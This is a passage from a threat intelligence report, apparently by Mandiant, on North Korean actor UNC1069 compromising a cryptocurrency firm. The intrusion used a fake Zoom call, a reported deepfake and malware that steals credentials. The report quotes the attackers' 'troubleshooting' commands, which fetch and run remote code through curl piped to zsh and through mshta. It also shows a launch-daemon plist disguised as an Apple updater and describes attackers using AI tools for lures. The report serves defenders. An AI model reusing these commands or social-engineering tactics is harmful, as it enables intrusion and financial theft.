Threat Intelligence UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering February 9, 2026 Mandiant Mandiant Services Stop attacks, reduce risk, and advance your security. Contact Mandiant Written by: Ross Inman, Adrian Hernandez Introduction North Korean threat actors continue to evolve their tradecraft to target the cryptocurrency and decentralized finance (DeFi) verticals. Mandiant recently investigated an intrusion targeting a FinTech entity within this sector, attributed to UNC1069 , a financially motivated threat actor active since at least 2019. This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH and CHROMEPUSH. The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim. These tactics build upon a shift first documented in the November 2025 publication GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools where Google Threat Intelligence Group (GTIG) identified UNC1069's transition from using AI for simple productivity gains to deploying novel AI-enabled lures in active operations. The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft. While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion in their capabilities. Initial Vector and Social Engineering The victim was contacted via Telegram by an account of an executive of a cryptocurrency company that had been compromised by UNC1069. Mandiant identified claims from the true owner of the account, posted from another social media profile, where they had posted a warning to their contacts that their Telegram account had been hijacked; however, Mandiant was not able to verify or establish contact with this executive. UNC1069 engaged the victim and, after continuing a rapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link itself directed to a spoofed Zoom meeting that was hosted on the threat actor's infrastructure, zoom[.]uswe05[.]us . The victim reported that during the call, they were presented with a video of a CEO from another cryptocurrency company that appeared to be a deepfake. While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the ruse aligns perfectly with activity previously tracked by GTIG. As detailed in our November 2025 research , UNC1069 has successfully leveraged deepfake images and video lures impersonating industry figures to distribute its BIGMACHO backdoor. In those previous campaigns, the actor prompted targets to install a malicious "Zoom SDK," a precursor to the technical troubleshooting lure observed in this intrusion. These techniques include the capture of images or video, indicating open-source intelligence (OSINT) collection to conduct social engineering attacks. This hypothesis is reinforced by the original profile of the individual impersonated during the attack reporting an account takeover by an unknown adversary . Once in the "meeting," the fake video call facilitated a ruse that gave the impression to the end user that they were experiencing audio issues. This was employed by the threat actor to conduct a ClickFix attack: an attack technique where the threat actor directs the user to run troubleshooting commands on their system to address a purported technical issue. The recovered web page provided two sets of commands to be run for "troubleshooting": one for macOS systems, and one for Windows systems. Embedded within the string of commands was a single command that initiated the infection chain. Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives. This includes the use of fake Zoom meetings and a known use of AI tools by the threat actor for editing images or videos during the social engineering stage. UNC1069 is known to use tools like Gemini to develop tooling, conduct operational research, and assist during the reconnaissance stages, as reported by GTIG. Additionally, Kaspersky recently claimed Bluenoroff, a threat actor that overlaps with UNC1069, is also using GTP-4o models to modify images indicating adoption of GenAI tools and integration of AI into the adversary lifecycle. Infection Chain In the incident response engagement performed by Mandiant, the victim executed the "troubleshooting" commands provided in Figure 1, which led to the initial infection of the macOS device. system_profiler SPAudioData softwareupdate --evaluate-products --products audio --agree-to-license curl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh system_profiler SPSoundCardData softwareupdate --evaluate-products --products soundcard system_profiler SPSpeechData softwareupdate --evaluate-products --products speech --agree-to-license Figure 1: Attacker commands shared during the social engineering stage A set of "troubleshooting" commands that targeted Windows operating systems was also recovered from the fake Zoom call webpage: setx audio_volume 100 pnputil /enum-devices /connected /class "Audio" mshta hxxp://mylingocoin[.]com/audio/fix/6454694440 wmic sounddev get Caption, ProductName, DeviceID, Status msdt -id AudioPlaybackDiagnostic exit Figure 2: Attacker commands shared when Windows is detected Evidence of AppleScript execution was recorded immediately following the start of the infection chain; however, contents of the AppleScript payload could not be recovered from the resident forensic artifacts on the system. Following the AppleScript execution a malicious Mach-O binary was deployed to the system. The first malicious executable file deployed to the system was a packed backdoor tracked by Mandiant as WAVESHAPER. WAVESHAPER served as a conduit to deploy a downloader tracked by Mandiant as HYPERCALL as well as subsequent additional tooling to considerably expand the adversary's foothold on the system. Mandiant observed three uses of the HYPERCALL downloader during the intrusion: Execute a follow-on backdoor component, tracked by Mandiant as HIDDENCALL, which provided hands-on keyboard access to the compromised system Deploy another downloader, tracked by Mandiant as SUGARLOADER Facilitate the execution of a toehold backdoor, tracked by Mandiant as SILENCELIFT, which beacons system information to a command-and-control (C2 or C&C) server Figure 3: Attack chain XProtect XProtect is the built-in anti-virus technology included in macOS. Originally relying on signature-based detection only, the XProtect Behavioral Service (XBS) was introduced to implement behavioral-based detection. If a program violates one of the behavioral-based rules, which are defined by Apple, information about the offending program is recorded in the XProtect Database (XPdb), an SQLite 3 database located at /var/protected/xprotect/XPdb . Unlike signature-based detections, behavioral-based detections do not result in XProtect blocking execution or quarantining of the offending program. Mandiant recovered the file paths and SHA256 hashes of programs that had violated one or more of the XBS rules from the XPdb. This included information on malicious programs that had been deleted and could not be recovered. As the XPdb also includes a timestamp of the detection, Mandiant could determine the sequence of events associated with malware execution, from the initial infection chain to the next-stage malware deployments, despite no endpoint detection and response (EDR) product being present on the compromised system. Data Harvesting and Persistence Mandiant identified two disparate data miners that were deployed by the threat actor during their access period: DEEPBREATH and CHROMEPUSH. DEEPBREATH, a data miner written in Swift, was deployed via HIDDENCALL—the follow-on backdoor component to HYPERCALL. DEEPBREATH manipulates the Transparency, Consent, and Control (TCC) database to gain broad file system access, enabling it to steal: Credentials from the user's Keychain Browser data from Chrome, Brave, and Edge User data from two different versions of Telegram User data from Apple Notes DEEPBREATH stages the targeted data in a temporary folder location and compresses the data into a ZIP archive, which was exfiltrated to a remote server via the curl command-line utility. Mandiant also identified HYPERCALL deployed an additional malware loader, tracked as part of the code family SUGARLOADER. A persistence mechanism was installed in the form of a launch daemon for SUGARLOADER, which configured the system to execute the malware during the macOS startup process. The launch daemon was configured through a property list (Plist) file, /Library/LaunchDaemons/com.apple.system.updater.plist . The contents of the launch daemon Plist file are provided in Figure 4. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>com.apple.system.updater</string> <key>ProgramArguments</key> <array> <string>/Library/OSRecovery/SystemUpdater</string> </array> <key>RunAtLoad</key> <true/> <key>KeepAlive</key> <false/> <key>ExitTimeOut</key> <integer>10</integer> </dict> </plist> Figure 4: Launch daemon Plist configured to execute SUGARLOADER The SUGARLOADER sample recovered during the investigation did not have any internal f